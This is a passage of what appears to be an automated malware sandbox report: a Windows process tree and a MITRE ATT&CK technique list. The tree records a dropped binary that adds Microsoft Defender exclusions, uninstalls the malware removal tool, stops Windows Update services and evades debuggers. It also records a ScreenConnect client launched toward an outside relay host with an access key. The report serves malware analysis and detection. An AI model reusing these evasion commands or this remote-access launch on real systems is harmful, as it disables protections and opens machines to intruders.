  C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 7828 -ip 7828
  2⤵
  PID:7836
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 8048 -ip 8048
  2⤵
  PID:5884
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6724 -ip 6724
  2⤵
  PID:7236
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7636 -ip 7636
  2⤵
  PID:6312
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7828 -ip 7828
  2⤵
  PID:3436
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 8048 -ip 8048
  2⤵
  PID:7936
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4908 -ip 4908
  2⤵
  PID:7384
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 7060 -ip 7060
  2⤵
  PID:7744
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 7828 -ip 7828
  2⤵
  PID:2236
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6724 -ip 6724
  2⤵
  PID:7072
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5556 -ip 5556
  2⤵
  PID:6264
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4908 -ip 4908
  2⤵
  PID:5764
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 7060 -ip 7060
  2⤵
  PID:6360
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7828 -ip 7828
  2⤵
  PID:6192
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5556 -ip 5556
  2⤵
  PID:8076
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4908 -ip 4908
  2⤵
  PID:2304
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7508 -ip 7508
  2⤵
  PID:3728
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 7828 -ip 7828
  2⤵
  PID:7088
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5556 -ip 5556
  2⤵
  PID:7092
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4908 -ip 4908
  2⤵
  PID:2544
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 8048 -ip 8048
  2⤵
  PID:5948
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7636 -ip 7636
  2⤵
  PID:2392
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5556 -ip 5556
  2⤵
  PID:1632
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 7848 -ip 7848
  2⤵
  PID:2432
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 8048 -ip 8048
  2⤵
  PID:7676
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 7636 -ip 7636
  2⤵
  PID:7444
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 7848 -ip 7848
  2⤵
  PID:7796
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 5556 -ip 5556
  2⤵
  PID:1372
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7060 -ip 7060
  2⤵
  PID:5520
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 8048 -ip 8048
  2⤵
  PID:1400
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5556 -ip 5556
  2⤵
  PID:6672
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7848 -ip 7848
  2⤵
  PID:5552
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 7060 -ip 7060
  2⤵
  PID:7812
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4908 -ip 4908
  2⤵
  PID:7172
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 7508 -ip 7508
  2⤵
  PID:3976
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 7828 -ip 7828
  2⤵
  PID:7472
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 7636 -ip 7636
  2⤵
  PID:7784
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4908 -ip 4908
  2⤵
  PID:5872
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7636 -ip 7636
  2⤵
  PID:8184
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 7060 -ip 7060
  2⤵
  PID:6852
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 7508 -ip 7508
  2⤵
  PID:2372
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7508 -ip 7508
  2⤵
  PID:6416
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 7060 -ip 7060
  2⤵
  PID:8704
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5556 -ip 5556
  2⤵
  PID:9092
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 8048 -ip 8048
  2⤵
  PID:9952
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6724 -ip 6724
  2⤵
  PID:4592
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6724 -ip 6724
  2⤵
  PID:9816
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 8048 -ip 8048
  2⤵
  PID:8096
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7848 -ip 7848
  2⤵
  PID:10032
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 8048 -ip 8048
  2⤵
  PID:10140
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5556 -ip 5556
  2⤵
  PID:10548
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 7848 -ip 7848
  2⤵
  PID:10756
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 7636 -ip 7636
  2⤵
  PID:10928
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5556 -ip 5556
  2⤵
  PID:11048
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7828 -ip 7828
  2⤵
  PID:5472
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4908 -ip 4908
  2⤵
  PID:4820
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 7636 -ip 7636
  2⤵
  PID:10828
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 7060 -ip 7060
  2⤵
  PID:8068
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 7828 -ip 7828
  2⤵
  PID:10340
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4908 -ip 4908
  2⤵
  PID:7468
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 7508 -ip 7508
  2⤵
  PID:10916
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 7060 -ip 7060
  2⤵
  PID:10340
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7508 -ip 7508
  2⤵
  PID:5356
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 9204 -ip 9204
  2⤵
  PID:13152
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 7940 -ip 7940
  2⤵
  PID:20140
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 13084 -ip 13084
  2⤵
  PID:20324

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6008

C:\ProgramData\WindowsServices\WindowsAutHost
C:\ProgramData\WindowsServices\WindowsAutHost
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:5316
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3744
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2320
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2800
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1608
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3596
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4284
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6124
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5812
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1500
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:960
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:4276
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1320
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:2768
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5332
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:6000
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5072
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:1236
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5856
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:6044
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:1980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:3556
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:4032
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6184
- - C:\ProgramData\WindowsServices\WindowsAutHost
    "C:\ProgramData\WindowsServices\WindowsAutHost"
    3⤵
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:7896
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:5932
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:7284
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7576
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:6824
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2120
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4960
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2760
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2820
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:7932
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:5424
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3756
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:6108
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7472
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:7016
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:7904
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:6660
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6312
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:7396
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:3096

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4956

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4192

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6252

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:13688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:13656

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:21280

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:26388
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 24C4B1ACD8021072A2A37A271EB988DD C
  2⤵
  PID:19592
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI5CE8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240999906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    PID:23008
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2EB799B80988A4B6B161A6153CFACA98
  2⤵
  PID:21904
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding E47CE405A3B6AD5E031DFC5C2C298108 E Global\MSI0000
  2⤵
  PID:9024

C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=support.cagboot.com&p=8019&s=92d94c73-ae82-4da4-958c-64541b42b536&k=BgIAAACkAABSU0ExAAgAAAEAAQC33BYiLLzjA0HB310eKHeWmWeBQVx26yHNU%2fZC0WHrAlcNPvscK6LX9rCshcpYxJNlp6Gr1byJz3q1uPEPhnXk%2fOQN38rohQydIODiuiyid0XP7IqW3wCeRLR4nYsDs7O9XY%2bU55HYBFfSZubUf0lRJ194P6JONzWHVWVmNby7dnCVgQX%2fXUVmXF%2bHjS%2f6ncVL9IHMmpOlTK7pZs7J5eSUPSw6tC%2bfRb2Yt0DESC45AJz1cXuqGwYAMS%2fdbmEwV37KU%2fcSd50XBkGWCpRo50msgOdDjAoSr0D5rfHkAk3mHfBYPSyXeg16GrgfCZwPOp4B3gxshRdSlj%2fXo6qPfv%2b4&t=APSVR&c=Server&c=&c=&c=&c=&c=&c=&c="
1⤵
PID:21396
- C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe" "RunRole" "aa9fd3a6-69c2-4b17-935d-fa61f83d3c72" "User"
  2⤵
  PID:19400
- C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe" "RunRole" "3b68e740-3b7c-4284-be42-26c01b65f095" "User"
  2⤵
  PID:26980
- C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe" "RunRole" "f188787f-ad31-4ee9-8725-b7bc9b2f9402" "User"
  2⤵
  PID:33072
- C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe" "RunRole" "e091b910-f8b4-487e-a78c-9b538571eabb" "User"
  2⤵
  PID:39008
- C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe" "RunRole" "f8c5793b-fc87-423a-b951-756bbc779584" "User"
  2⤵
  PID:45780
- C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe" "RunRole" "dd4fadac-d042-4359-82b1-0e3217c5c154" "User"
  2⤵
  PID:50840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 38768 -ip 38768
1⤵
PID:37968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery